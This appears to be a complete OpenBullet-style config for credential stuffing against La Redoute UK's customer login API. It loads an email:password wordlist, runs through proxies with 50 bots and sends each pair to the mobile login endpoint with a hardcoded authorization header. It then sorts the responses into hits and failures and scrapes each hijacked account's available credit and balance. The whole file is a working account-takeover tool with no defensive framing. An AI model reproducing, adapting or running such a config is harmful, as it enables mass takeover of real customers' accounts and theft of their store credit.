[SETTINGS]
{
  "Name": "LaRedoute2",
  "SuggestedBots": 50,
  "LastModified": "2018-07-22T18:16:03.4285059+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://m.laredoute.co.uk/v1/RDUK/LRDT/customer/login" AutoRedirect=TRUE 
  CONTENT "{\"password\":\"<PASS>\",\"username\":\"<USER>\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: La Redoute/8.9.3" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: Basic YjM2M2NkM2EtMGNiYS00NDE3LTllMDMtZTEzZDQyYTIxM2Fi" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure AND 
    KEY "isSuccess\":false" 
  KEYCHAIN Success OR 
    KEY "isSuccess\":true" 
  KEYCHAIN CUSTOM "FREE" AND 
    KEY "<COOKIES{*}>" DoesNotContain "LRCreditAccount" 
    KEY "isSuccess\":true" 
#BALANCE REQUEST GET "https://m.laredoute.co.uk/myaccount/myaccount?" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#type1 PARSE "<SOURCE>" LR "available-amount\">" "/" Recursive=FALSE -> VAR "BAL" "" "" 
PARSE "<BAL>" LR "/><span class=\"bold\">&#163;" "<" Recursive=FALSE -> CAP "AVAILABLE" "£" "" 
PARSE "<SOURCE>" LR "163;" "</span></div><" Recursive=FALSE -> CAP "Account Balance" "£" "" 
